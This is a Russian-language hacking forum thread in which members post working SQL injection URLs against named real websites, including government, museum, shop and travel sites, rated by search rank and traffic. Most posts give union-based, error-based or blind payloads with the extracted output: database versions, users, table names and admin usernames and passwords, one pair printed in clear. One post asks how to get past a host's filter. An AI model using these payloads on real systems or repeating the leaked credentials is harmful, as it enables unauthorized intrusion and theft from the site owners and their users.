SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    PHP:
    http://www.heatpipe.asia/news_content.php?id=-1708+union+select+1,2,0x48656c6c6f2c20776f726c6421,4,5,6,7--
     
  2. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    372
    Likes Received:
    163
    Reputations:
    126
    Сайт турагенства
    Тиц 60
    пр 2

     
    _________________________
  3. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    PHP:
    http://www.ju-jitsu-az.com/photos.php?cat=-3+union+select+1,2,concat_ws(0x03a,user(),database(),version()),4--
     
  4. vlad-i-mir

    vlad-i-mir New Member

    Joined:
    27 Feb 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://cinv.tv/anons?id=-2%20union%20select%201,concat_ws(0x3a,username,password),3,4,5,6,7,8,9%20from%20modx_manager_users%20limit%200,1%20--
     
  5. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    PHP:
    http://orka-aero.com/index.php?str=4&ido=429&idp=-710+union+select+1,2,3,4,file_priv,6,7,8,9+from+mysql.user--
     
  6. SS_47

    SS_47 Member

    Joined:
    5 Apr 2012
    Messages:
    18
    Likes Received:
    5
    Reputations:
    7
    PHP:
    http://www.peski.ru/index.php?action=news&id=3932)+and+1=2+union+select+1,user,3,password,5,6+from+mysql.user/*
     
  7. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    PHP:
    http://www.springspartner.com/springsvegetables.php?cat=2&fruit=-2+union+select+1,concat_ws(0x03a,user(),database(),version()),3,4,5,6--
     
    1 person likes this.
  8. SS_47

    SS_47 Member

    Joined:
    5 Apr 2012
    Messages:
    18
    Likes Received:
    5
    Reputations:
    7
    PHP:
    http://www.helicobacter.ru/index.php?i=-8+union+select+1,2,3,4,5,6,7,8,9,username,11,user_password,13+from+f_users+where+username='имя пользователя с форума'
     
    1 person likes this.
  9. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    dma.state.mn.us PR-6
    Нац. Гвардия штата Миннесота
    Code:
    www.dma.state.mn.us/press_room/e-zine/articles/index.php?item=-280+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
    Code:
    5.0.95-log:ng_internet@localhost:ng_internet
    abireg.ru ТИЦ-1300 4к траффа
    Code:
    www.abireg.ru/sb/print.php?news=475'+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21+--+
    Code:
    5.0.26-lk-log:abiregmsk_school@localhost:abiregmsk_school
    banglabarta24.net Alexa-164k blind
    Code:
    http://www.banglabarta24.net/english/Tamplate/news.php?news=UvSLyGQdxeQ' and 5=substring(version(),1,1) and 'tGbv'='tGbv&&ac=international
     
    2 people like this.
  10. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    ------
     
  11. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    PHP:
    http://www.aussiewolf.hu/index.php?id=40+union+select+concat_ws(database(),user(),version())--
     
  12. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    PHP:
    http://threadandco.com/shop.php?id=42+union+select+1,concat_ws(0x3,id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
    ----------------------------------------------up
    PHP:
    http://www.glenferrie.com.au/shop.php?id=42+union+select+1,group_concat(0x0b,id,0x3a,user_name,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+login_admin+--
     
    #14752 Bb0y, 13 Apr 2012
    Last edited: 13 Apr 2012
    1 person likes this.
  13. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    temi.provincia.milano.it PR-7
    Code:
    http://temi.provincia.milano.it/donne/news/newst.php?news=-12260+UnIon+selECt+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84+--+
    Code:
    5.0.77-log:donne@10.120.192.16:d_portale
    allotment.org.uk PR-5 Alexa-49k
    Code:
    http://www.allotment.org.uk/diary/diary_day_detail.php?item=(348)and(select+1+from(select+count(*),concat(select+concat_ws(0x3a,version(),user(),database()+limit+0,1),floor(rand(0)*2)x+from+information_schema.tables+group+by+x)a)--
    Code:
    5.0.95-community:lotty_1@localhost:lotty_11
    gemseducation.com PR-5 Alexa-182k
    Code:
    www.gemseducation.com/MENASA/gwa0029/contents.php?pageid=-712+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
    Code:
    5.0.77:gemsDBusr@localhost:gemseducation1
     
  14. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    cy 60, pr 4, dmoz
    http://life-prog.ru/view_video.php?id=-21%27+union+select+1,2,3,version%28%29,5,6+--+f
     
  15. mst

    mst New Member

    Joined:
    27 Jun 2010
    Messages:
    3
    Likes Received:
    3
    Reputations:
    0
    Injectable column: 2
    Version: 5.0.91-log
    Tables count: 1
    Tuc:pR - 10:3
    SELECT database(): cheatsah_games
    ________________________________________
    Омский государственный театр драмы
    Injectable column: 3
    Version: 5.1.61-0+squeeze1-log
    Tables count: 33
    adminlogin,adminpassword FROM admins - Admin211140:h18kUYP3
    Tuc:pR - 300:3
    SELECT database(): z106032_omskdram
     
  16. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    372
    Likes Received:
    163
    Reputations:
    126
    Тиц 3600
    PR 6

    Дальше крутить совесть и религия не позволила :)
     
    _________________________
    1 person likes this.
  17. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    915
    Likes Received:
    482
    Reputations:
    724
    Докрутить не смог, вроде фильтрация идёт на уровне хостинга, даёт 403 еррору если в адресе есть union и select. Если кто подопнёт с советом буду рад.
     
    _________________________
  18. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Для любителей велосипедного спорта.

    PHP:
    http://www.ciclisme.cat/calendario_listado.php?modalidad=-1+union+select+1,table_name,3+from+information_schema.tables+where+table_schema=0x6369636C69736D655F66656465636174--
     
  19. mst

    mst New Member

    Joined:
    27 Jun 2010
    Messages:
    3
    Likes Received:
    3
    Reputations:
    0
    Version: 5.0.95-community:c</title><meta name=keywords content="1d:5.0.95-community
    Tables count: ?
    Tuc:pR - 20:4
    SELECT database(): ivcomua_db:c</title><meta name=keywords content="1d:ivcomua_db


    ================================================

    Injectable column: 2
    Version: 5.0.51a-24+lenny5-log
    Tables count: 125
    Tuc:pR - 20:2


    ================================================

    Продажа телефонов -)
    Injectable column: 5
    Version: 5.0.87.d10-ourdelta-log
    Tables count: 12
    Tuc:pR - 10:1
    Admin directory may be here: /admin.php
    SELECT database(): Andry_phoneline
     
  20. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Code:
    http://www.statusx.ru/index.php?status=1[B][COLOR=Red]+and+substring(@@version,1,1)=5[/COLOR][/B]
    Code:
    http://www.kmsmuseum.ru/news.php?status=1&id=28[B][COLOR=Red]+and+substring(@@version,1,1)=5[/COLOR][/B]
    Code:
    http://www.lessons.jet-host.ru/product.php?status=1[B][COLOR=Red]+and+1=0+union+Select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--+[/COLOR][/B]
    version: 5.5.16-55
    database: jetru_6402670_product
    user: jetru_6402670@192.168.0.78
     
Loading...
Thread Status:
Not open for further replies.